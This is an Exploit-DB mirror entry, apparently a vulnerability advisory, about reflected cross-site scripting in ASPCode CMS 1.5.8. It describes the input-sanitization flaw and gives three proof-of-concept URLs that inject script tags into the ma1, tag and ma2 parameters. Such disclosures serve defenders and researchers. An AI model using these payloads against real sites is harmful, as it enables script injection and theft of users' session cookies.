exploit-db-mirror/platforms/asp/webapps/33722.txt
Offensive Security e662f4d577 Updated 06_13_2014
2014-06-13 04:39:15 +00:00

13 lines
827 B
Text
Executable file

source: http://www.securityfocus.com/bid/38601/info
ASPCode CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ASPCode CMS 1.5.8 is vulnerable; other versions may also be affected.
http://www.example.com/default.asp?sec=1&ma1="><script>alert("XSS");</script>
http://www.example.com/default.asp?sec=1&tag="><script>alert("XSS");</script>
http://www.example.com/default.asp?sec=1&ma2="><script>alert("XSS");</script>
http://www.example.com/default.asp?sec=33&ma1=forgotpass